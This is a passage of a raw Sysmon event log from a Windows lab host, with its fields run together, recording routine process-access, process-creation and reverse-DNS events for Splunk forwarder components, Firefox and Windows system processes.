AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000017976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.289{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.252{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.217{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.217{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000018044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.419{59A5CD1D-8E56-6005-2E00-00000000A301}2464113.7.86.99.in-addr.arpa.0type: 12 server-99-86-7-113.fra6.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.417{59A5CD1D-8E56-6005-2E00-00000000A301}2464219.220.186.35.in-addr.arpa.0type: 12 219.220.186.35.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000018042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.416{59A5CD1D-8E56-6005-2E00-00000000A301}246480.207.58.216.in-addr.arpa.0type: 12 fra16s25-in-f16.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000018041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.237{59A5CD1D-948E-6005-4205-00000000A301}56524564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.074{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-948E-6005-4205-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.072{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.072{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.072{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.072{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.072{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-948E-6005-4205-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.072{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-948E-6005-4205-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.928{59A5CD1D-948E-6005-4205-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.995{59A5CD1D-9490-6005-4405-00000000A301}68684436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.824{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9490-6005-4405-00000000A301}6868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.822{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9490-6005-4405-00000000A301}6868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.821{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9490-6005-4405-00000000A301}6868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.679{59A5CD1D-9490-6005-4405-00000000A301}6868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x800000000000000018057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.426{59A5CD1D-8E56-6005-2E00-00000000A301}2464234.63.190.35.in-addr.arpa.0type: 12 234.63.190.35.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000018056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.419{59A5CD1D-8E56-6005-2E00-00000000A301}2464182.169.202.18.in-addr.arpa.0type: 12 ec2-18-202-169-182.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.419{59A5CD1D-8E56-6005-2E00-00000000A301}2464163.253.35.13.in-addr.arpa.0type: 12 server-13-35-253-163.fra6.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.419{59A5CD1D-8E56-6005-2E00-00000000A301}2464163.100.84.104.in-addr.arpa.0type: 12 a104-84-100-163.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x800000000000000018053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.176{59A5CD1D-9490-6005-4305-00000000A301}70765908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.017{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9490-6005-4305-00000000A301}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.016{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 